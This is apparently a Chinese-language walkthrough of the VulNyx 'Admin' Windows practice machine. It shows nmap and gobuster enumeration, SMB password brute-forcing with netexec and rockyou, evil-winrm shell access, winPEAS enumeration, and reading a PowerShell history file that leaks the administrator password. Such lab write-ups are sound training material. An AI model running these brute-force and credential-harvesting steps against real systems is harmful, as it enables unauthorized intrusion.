VulNyx Admin Walkthrough

win系统,靶机下载地址https://vulnyx.com/file/Admin.php。
主要是windows下的信息收集。

扫描端口。

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 09:46 CST
Nmap scan report for 192.168.56.143
Host is up (0.00033s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:6F:32:A3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: ADMIN, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:6f:32:a3 (Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2024-11-04T07:47:21
|_  start_date: N/A
|_clock-skew: 6h00m02s

这台机器没有开ldap服务,但开了80端口,扫一下文件,只找到一个txt文件。

gobuster dir -u "http://192.168.56.143/" -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.asp,.aspx,.txt -b 401,403,404,500  -o 80.log
/tasks.txt            (Status: 200) [Size: 98]
/Tasks.txt            (Status: 200) [Size: 98]
/TASKS.txt            (Status: 200) [Size: 98]

查看文件内容,看来是提示,并知道了用户名hope。

└─$ curl http://$IP/tasks.txt 
Pending tasks:

 - Finish website
 - Update OS
 - Drink coffee
 - Rest
 - Change password

By hope

知道了用户名,使用smb爆破出密码。

└─$ netexec smb $IP -u hope -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB         192.168.56.143  445    ADMIN            [+] ADMIN\hope:loser

检测winrm权限,可以登录。

└─$ netexec winrm $IP -u hope -p loser 
WINRM       192.168.56.143  5985   ADMIN            [*] Windows 10 / Server 2019 Build 19041 (name:ADMIN) (domain:ADMIN)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.143  5985   ADMIN            [+] ADMIN\hope:loser (Pwn3d!)

以hope用户可以进入shell,拿到user flag。

└─$ evil-winrm -i $IP -u hope  -p loser                                    

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\hope\Documents> whoami
admin\hope

上传winPEAS进行信息收集,注意到powershell的hst文件。

ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell Settings                                                                                                                                              
    PowerShell v2 Version: 2.0                                                                                                                                                
    PowerShell v5 Version: 5.1.19041.1                                                                                                                                        
    PowerShell Core Version:                                                                                                                                                  
    Transcription Settings:                                                                                                                                                   
    Module Logging Settings:                                                                                                                                                  
    Scriptblock Logging Settings:                                                                                                                                             
    PS history file: C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt                                                            
    PS history size: 234B

查看文件内容,里面给出了管理员密码。

*Evil-WinRM* PS C:\Users\hope\Documents> type C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Set-LocalUser -Name "administrator" -Password (ConvertTo-SecureString "SuperAdministrator123" -AsPlainText -Force)

以管理员密码登录,拿到root。

└─$ evil-winrm -i $IP -u administrator  -p SuperAdministrator123

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
admin\administrator

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注